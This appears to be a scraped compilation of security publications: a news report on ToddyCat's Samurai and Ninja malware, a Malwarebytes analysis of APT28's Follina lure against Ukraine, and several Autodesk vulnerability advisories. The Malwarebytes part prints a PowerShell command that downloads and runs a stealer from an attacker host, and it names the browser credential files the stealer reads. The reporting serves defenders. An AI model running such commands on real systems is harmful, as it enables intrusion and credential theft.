ToddyCat's Samurai and Ninja tools are designed to give attackers persistent and deep access on compromised networks, security vendor says.

A threat group that may have been among the first to exploit the ProxyLogon zero-day vulnerability in Exchange Servers last year is using a pair of dangerous and previously unseen malware tools in a cyber espionage campaign targeting military and government organizations in Europe and Asia.

Researchers at Kaspersky who first detected the group's activities this week described the tools as malware designed to enable long-term persistence on an organization's public-facing Web servers and giving attackers the ability to move laterally and penetrate deeply into compromised networks.

The malware tools have features that allow their functionality to be extended at will, but Kaspersky has been unable so far to determine the full range of their capabilities, the vendor noted.

**Attacks Targeted ProxyLogon Exchange Server Flaw**

Kaspersky is tracking the previously unknown group as "ToddyCat." In a report this week, the security vendor said the adversary's victim targeting and certain operational overlaps with at least one known Chinese threat actor suggest that members of ToddyCat are Chinese-speaking as well.

"This group targets high-profile organizations, usually government, diplomatic, military organizations, and military contractors," says Giampaolo Dedola, security researcher at Kaspersky. It may be possible that the threat actor has compromised victims in the US as well. But currently Kaspersky has no information to suggest this is indeed the case, Dedola says.

Kaspersky's analysis showed that ToddyCat's campaign began in December 2020 with attacks targeting selected Exchange Servers belonging to three organizations in Vietnam and Taiwan. The attackers used an unknown exploit to breach the Exchange Servers and deploy the popular China Chopper Web shell on the systems. They then used the Web shell to initiate a multi-stage infection chain involving custom loaders that ended with one of the new malware tools — a backdoor called "Samurai" — being deployed on the compromised system.

**Sophisticated Malware**

Samurai is a passive backdoor designed to give the attackers persistent access on Internet-facing Web servers. The backdoor works on ports 80 and 443 and is designed primarily to execute arbitrary C# code on infected systems.

"Based on our investigation, we were able to detect some of the source codes uploaded by the attacker and we know that it was used to execute arbitrary commands, download files, forward TCP packets to internal hosts," Dedola says. As one example, he points to the attacker using Samurai to communicate with internal Active Directory servers. "The ability to run arbitrary C# code allows attackers to infinitely extend the malware's capabilities," he says.

Kaspersky's research showed the attackers also used Samurai to launch "Ninja," the other previously unseen malware tool that ToddyCat is using in its attacks. Ninja is Cobalt Strike-like malware for executing post-exploitation activities on already compromised systems.

"It allows the attackers to control the remote system, manipulate the file system, manipulate processes, inject arbitrary code in other processes, forward TCP packets, and load new modules in its memory," Dedola says.

Ninja agents can be configured to act like servers. So, the adversary can use the malware to designate specific machines as internal command and control servers (C2s), thereby limiting connections to external servers and reducing the chances of being detected. This feature, combined with the TCP command forwarding functionality, gives the attackers a way to manage even those systems that are not directly connected to the Internet, Dedola says.

Between Dec. 2020 and early Feb. 2021, ToddyCat remained tightly focused on a handful of organizations in Vietnam and Taiwan. But then, for a brief period between late February and early March, the threat actor quickly escalated its attacks by targeting the ProxyLogon vulnerability to compromise organizations in multiple countries. The group's victims included organizations in Russia, UK, Slovakia, India, Iran, and Malaysia, and belonged to industries and sectors that have traditionally been of interest to China-based groups, Kaspersky said.

**A Change in Tactics**

Almost all of ToddyCat's early attacks targeted Exchange Server flaws. But starting Sept. 2021, Kaspersky observed what it described as "waves of attacks" against desktop systems involving the use of malicious loaders sent via the Telegram messaging service. It's unclear how many organizations ToddyCat has compromised, but the number is likely less than 30, Dedola says.

What makes Samurai and Ninja dangerous is the anti-forensic and anti-analysis technique incorporated into the malware, according to Kaspersky. For example. Samurai is designed to share TCP port 80 and 443 with Microsoft Exchange and cannot be detected by monitoring the ports. The malware also uses a complex loading scheme to avoid detection and maintain persistence. It addition, it uses a technique called "control-code flattening" to avoid detection by static analysis tools, Dedola says.

"The Ninja Trojan is also another modular malware, with capabilities that can be easily extended by the attacker," he tells Dark Reading, adding that the malware runs only in memory and never appears on file systems, making it harder to detect. "It is usually executed with a loader, which decrypts the payload from a third file. The file with the encrypted payload is immediately deleted by the loader."

Christopher Prewitt, CTO at Inversion6, says Kaspersky's research shows that the malware authors have gone to great lengths to hide and obfuscate their methods. While the Samurai backdoor features some relatively common features, ToddyCat's bespoke Ninja post-exploit tool appears more interesting.

"It is loaded in memory, making it much more difficult to analyze and detect," Prewitt says. "The threat actor could continue to reuse this part of their toolkit, while only swapping out or updating the initial infection point and backdoor tooling."

China-Linked ToddyCat APT Pioneers Novel Spyware

Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

**The malicious document**

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

**Payload Analysis**

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

**Google Chrome and Microsoft Edge**

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

**Firefox**

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

**Exfiltrating data**

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

**Protection**

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

**IOCs**

**Maldoc:  
**Nuclear Terrorism A Very Real Threat.rtf  
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):  
**http://kitten-268.frge\[.\]io/article.html

**Stealer:  
**http://kompartpomiar\[.\]pl/grafika/docx.exe  
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:  
**www.specialityllc\[.\]com

Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

A maliciously crafted CAT file in Autodesk AutoCAD 2023 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Summary**

Multiple Autodesk products have been affected by Use After Free, Out-of-bound-write, Stack-based Buffer, Memory Corruption, and Buffer Overflow vulnerabilities.

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2022-25789 - A maliciously crafted DWF, 3DS and DWFX files in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

2) CVE-2022-25790 - A maliciously crafted DWF file in Autodesk AutoCAD 2022, 2021, 2020, 2019 and Autodesk Navisworks 2022, 2020, and 2019 can be used to write beyond the allocated boundaries when parsing the DWF files. Exploitation of this vulnerability may lead to code execution.

3) CVE-2022-25791 - A Memory Corruption vulnerability for DWF and DWFX files in Autodesk AutoCAD 2022, 2021, 2020, 2019 and Autodesk Navisworks 2022, 2020, and 2019 may lead to code execution through maliciously crafted DLL files.

4) CVE-2022-25792 - A maliciously crafted DXF file in Autodesk AutoCAD 2022, 2021, 2020, 2019 and Autodesk Navisworks 2022 can be used to write beyond the allocated buffer through Buffer overflow vulnerability. This vulnerability can be exploited to execute arbitrary code.

5) CVE-2022-25796 - A Double Free vulnerability allows remote malicious actors to execute arbitrary code on DWF file in Autodesk Navisworks 2022 within affected installations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

6) CVE-2022-27528 - A maliciously crafted DWFX and SKP files in Autodesk Navisworks 2022, 2020, and 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution

7) CVE-2022-27868 - A maliciously crafted CAT file in Autodesk AutoCAD 2023 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions**

**Update Source**

Autodesk® Navisworks®

2022, 2020, 2019

2022.2, 2020.5, 2019.7

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Architecture

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Electrical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Map 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mechanical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® MEP

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Plant 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® LT

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mac

2022

2022.2.2

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mac LT

2022

2022.2.2

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D®

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change._

_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk strongly recommends users of the 2019, 2020, 2021, 2022 and 2023 versions of Autodesk® Advance Steel, Autodesk® Civil 3D®, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above should install the latest AutoCAD® or AutoCAD LT 2022 updates, as applicable, via the Autodesk Desktop App or the Accounts Portal. An update is not available for 32bit AutoCAD 2019. Customers using this version should plan to upgrade to 64bit AutoCAD 2019 or a newer AutoCAD version as soon as possible to avoid downtime and potential security vulnerabilities.

In addition, users of Autodesk® Navisworks ® should install the latest 2022 Update 2, which is available via the Autodesk Desktop App or Accounts Portal. This version of Autodesk® Navisworks® includes security updates that address the DWF, and DWFX file vulnerabilities. As a general best practice, we also recommend that customers only open DWF, or DWFX files from trusted sources.

Customers using previous versions that no longer qualify for full support should plan to upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative for reporting CVE-2022-25789, CVE-2022-25790, CVE-2022-25791, CVE-2022-25792, CVE-2022-25796, CVE-2022-27528
*   Anonymous working with Trend Micro Zero Day Initiative for reporting CVE-2022-25789
*   Tran Van Khang - khangkito (VinCSS) working with Trend Micro Zero Day Initiative for reporting CVE-2022-27868

**Related Information**

More information on related security advisories can be found on the Autodesk Trust Center.

**Revision History**

**Revision**

**Date**

**Description**

1.0

2/28/2022

Initial Release of the Security Advisory

1.1

3/31/2022

Update of the Security Advisory for Addition to Navisworks and AutoCAD supported versions in Product Table

1.2

4/25/2022 

Update of the Security Advisory for Addition to AutoCAD 2023 supported versions in Product Table and CVE-2022-27868 description

1.3

4/28/2022 

Update of the Security Advisory for Addition to Navisworks 2020 supported version in Product Table

1.4

5/25/2022 

Update of the Security Advisory for Addition to Navisworks 2019 supported version in Product Table

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._

_© 2022, Autodesk, Inc._

CVE-2022-27868: Security Advisories | Autodesk Trust Center

A maliciously crafted JT file in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Summary**

Applications and Services that utilize certain Autodesk products may be affected by Out-of-bounds Read, Out-of-bounds Write, and Information disclosure vulnerabilities. Exploitation of these vulnerabilities in conjunction with other vulnerabilities may lead to code execution in the context of the current process. 

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2021-40158 - A maliciously crafted JT file in Autodesk Inventor 2022, 2021, 2020, 2019 and AutoCAD 2022 may be forced to read beyond allocated boundaries when parsing the JT file. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.

2) CVE-2021-40159 - An Information Disclosure vulnerability for JT files in Autodesk Inventor 2022, 2021, 2020, 2019 in conjunction with other vulnerabilities may lead to code execution through maliciously crafted JT files in the context of the current process.

3) CVE-2022-25788 - A maliciously crafted JT file in Autodesk AutoCAD 2023 and 2022 may be used to write beyond the allocated buffer while parsing JT files. This vulnerability can be exploited to execute arbitrary code.

4) CVE-2022-27867 - A maliciously crafted JT file in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions**

**Update Source**

Autodesk® Inventor

2022, 2021, 2020, 2019

2022.2

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Architecture

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Electrical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Map 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mechanical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® MEP

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Plant 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® LT

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D®

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change_

_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk highly recommends that customers download and install the latest version of Autodesk® Inventor 2022 Update 2 (version 2022.2), which is available via the Autodesk Desktop App or the Accounts Portal. This version of Autodesk Inventor includes security updates that address the JT file vulnerabilities. As a general best practice, we recommend that customers only open JT files from trusted sources and update to the latest software version.

Updates are not available for previously supported versions of Autodesk® Inventor and AutoCAD® – versions 2021-2019. Mitigation instructions for Autodesk® Inventor 2021-2019 are available in this Autodesk Knowledge Network article and for Autodesk AutoCAD-based products in this Autodesk Knowledge Network article. In addition, users of the 2019, 2020, 2021, 2022 and 2023 versions of Autodesk® Advance Steel, Autodesk® Civil 3D, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above should install the latest AutoCAD® or AutoCAD LT 2022 or 2023 updates, as applicable, via the Autodesk Desktop App or Accounts Portal.  

Customers using previous versions that no longer qualify for full support should plan to upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following researchers for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   xina1i working with HackerOne for reporting CVE-2021-40158 and CVE-2021-40159.
*   Mat Powell of Trend Micro Zero Day Initiative for reporting CVE-2021-40158, CVE-2021-40159, CVE-2022-25788, and CVE-2022-27867.
*   Tran Van Khang - khangkito (VinCSS) working with Trend Micro Zero Day Initiative for reporting CVE-2021-40158. 

**Revision History**

**Revision**

**Date**

**Description**

1.0

1/12/2022

Initial Release of the security advisory

1.1

2/28/2022

Updated Security Advisory

1.2

3/28/2022

Updated Security Advisory for all supported versions

1.3

4/25/2022

Update of the Security Advisory for Addition to AutoCAD 2023 supported versions in Product Table

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._ 

_© 2022, Autodesk, Inc._

CVE-2022-27867: Security Advisories | Autodesk Trust Center

Autodesk AutoCAD product suite, Revit, Design Review and Navisworks releases using PDFTron prior to 9.1.17 version may be used to write beyond the allocated buffer while parsing PDF files. This vulnerability may be exploited to execute arbitrary code.

**Summary**

Applications and Services that utilize versions of PDFTron prior to 9.1.17 may be impacted by Heap-based Buffer Overflow, and Untrusted Pointer Dereference vulnerabilities.

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2022-27871: Autodesk AutoCAD product suite, Revit, Design Review and Navisworks releases using PDFTron prior to 9.1.17 version may be used to write beyond the allocated buffer while parsing PDF files. This vulnerability may be exploited to execute arbitrary code.

2) CVE-2022-27872 : A maliciously crafted PDF file may be used to dereference a pointer for read or write operation while parsing PDF files in Autodesk Navisworks 2022. The vulnerability exists because the application fails to handle a crafted PDF file, which causes an unhandled exception. An attacker can leverage this vulnerability to cause a crash or read sensitive data or execute arbitrary code.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions\***

**Update Source**

Revit®

2022, 2021, 2020 

2022.1.2, 2021.1.6, 2020.2.8

Autodesk Desktop App, or Accounts Portal

Navisworks®

2022, 2020, 2019

2022.2, 2020.5, 2019.7

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD®

2022, 2021, 2020,2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Architecture

2022, 2021, 2020,2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Electrical

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Map 3D

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Mechanical

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® MEP

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Plant 3D

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® LT

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Mac

2022

2022.2.2

Autodesk Knowledge Network

AutoCAD® LT for Mac

2022

2022.2.2

Autodesk Knowledge Network

Autodesk ® Design Review

2018

2018 Hotfix 6

Autodesk Knowledge Network

Autodesk® 3ds Max®

2022, 2021

2022.3.3, 2021.3.8

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change._

_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk strongly recommends that users of the affected products listed above apply the available hotfix for their version via the Autodesk Desktop App or the Accounts Portal. As a general best practice, we also recommend that customers only open PDF files from trusted sources.

In addition, users of the 2019, 2020, 2021 and 2022 versions of Autodesk® Advance Steel, Autodesk® Civil 3D®, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above should install the latest AutoCAD®, AutoCAD LT 2022 Updates via the Autodesk Desktop App or Accounts Portal. An update is not available for 32bit AutoCAD 2019. Customers using this version should plan to upgrade to 64bit AutoCAD 2019 or a newer AutoCAD version as soon as possible to avoid downtime and potential security vulnerabilities.

Users of Autodesk® Navisworks ® should install the latest 2022 Update 2, which is available via the Autodesk Desktop App or Accounts Portal. This version of Autodesk ® Navisworks ® includes security updates that address the PDF file vulnerabilities. As a general best practice, we also recommend that customers only open PDF files from trusted sources.

Customers using previous versions that no longer qualify for full support should upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following researchers for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   Anonymous working with Trend Micro Zero Day Initiative for reporting CVE-2022-27871 and CVE-2022-27872

**Related Information**

More information on related security advisories can be found on the Autodesk Trust Center.

**Revision History**

**Revision**

**Date**

**Description**

1.0

5/25/2022

Initial Release of Security advisory

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._

_© 2022, Autodesk, Inc._

